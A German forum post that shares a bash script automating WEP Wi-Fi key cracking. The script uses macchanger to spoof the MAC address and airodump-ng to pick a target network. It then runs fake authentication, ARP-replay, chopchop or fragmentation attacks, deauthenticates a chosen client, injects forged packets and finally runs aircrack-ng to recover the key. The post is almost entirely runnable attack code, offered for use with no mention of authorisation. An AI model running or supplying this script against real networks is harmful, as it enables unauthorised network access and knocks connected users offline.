Ich hab hier mal ein kleines script gebastelt, das den ganzen vorgang ziemlich weit automatisiert.
gebraucht werden dafür macchanger und aircrack-ng, wenn jemand einen bug findet, bitte reporten.
Code:
#!/bin/bash
echo
echo "enter new mac address (default=00:11:11:11:11:11): "
read -e mac
if [ -z "$mac" ]; then
mac=00:11:11:11:11:11
fi
airmon-ng stop mon0
airmon-ng stop wlan0
airmon-ng start wlan0
clear
echo "##############################################"
echo "[+] Spoofing Mac"
echo "##############################################"
ifconfig wlan0 down
ifconfig mon0 down
macchanger -m $mac wlan0
macchanger -m $mac mon0
ifconfig wlan0 up
ifconfig mon0 up
mkdir wep-cracking
cd wep-cracking
xterm -geometry 100x15+1+0 -T "Who is online?" -bg black -fg green -e airodump-ng mon0&
pid=$!
while [ -z "$target" ]
do
echo -n "Select target mac: "
read -e target
done
while [ -z "$channel" ]
do
echo -n "Select target channel: "
read -e channel
done
kill $pid
rm *.cap 2>/dev/null
rm *.netxml 2>/dev/null
rm *.xor 2>/dev/null
rm *.csv 2>/dev/null
xterm -geometry 100x15+1+0 -T "Collect Data" -bg black -fg green -e airodump-ng mon0 -c $channel -w data&
sleep 1
echo "##############################################"
echo "[+] fake authentication"
echo "##############################################"
aireplay-ng -1 0 -a $target -h $mac mon0
while [[ "$attack" != "1" && "$attack" != "2" && "$attack" != "3" && "$attack" != "4" ]]
do
echo "###########attacking-methods##################"
echo "arp-replay = 1"
echo "chopchop = 2"
echo "fragmentation = 3"
echo "exit = 4"
echo "##############################################"
echo -n "Select attack: "
read -e attack
done
case "$attack" in
1)
echo -n "Select client mac for disconnect: "
read -e target_client
echo "##############################################"
echo "[+] starting arp-responder"
echo "##############################################"
xterm -geometry 100x15+0+230 -T "arp-responder" -bg black -fg green -e aireplay-ng -3 -b $target -h $mac mon0&
echo "[+] disconnecting target"
aireplay-ng -0 1 -a $target -c $target_client mon0
;;
2)
xterm -geometry 100x15+0+230 -T "chopchop" -bg black -fg green -e "echo y | aireplay-ng -4 -b $target -h $mac mon0"
;;
3)
xterm -geometry 100x15+0+230 -T "fragmentation" -bg black -fg green -e "echo y | aireplay-ng -5 -b $target -h $mac mon0"
;;
4)
killall xterm
exit 0
;;
esac
sleep 2
xor=$(find *.xor)
if [ -n "$xor" ]; then
packetforge-ng -0 -a $target -h $mac -k 255.255.255.255 -l 255.255.255.255 -y $xor -w packet
xterm -geometry 100x15+0+230 -T "injecting packet..." -bg black -fg green -e "echo y | aireplay-ng -2 -r packet mon0"&
fi
clear
echo to start cracking press enter
read
aircrack-ng -b $target data-01.cap
killall xterm
exit 0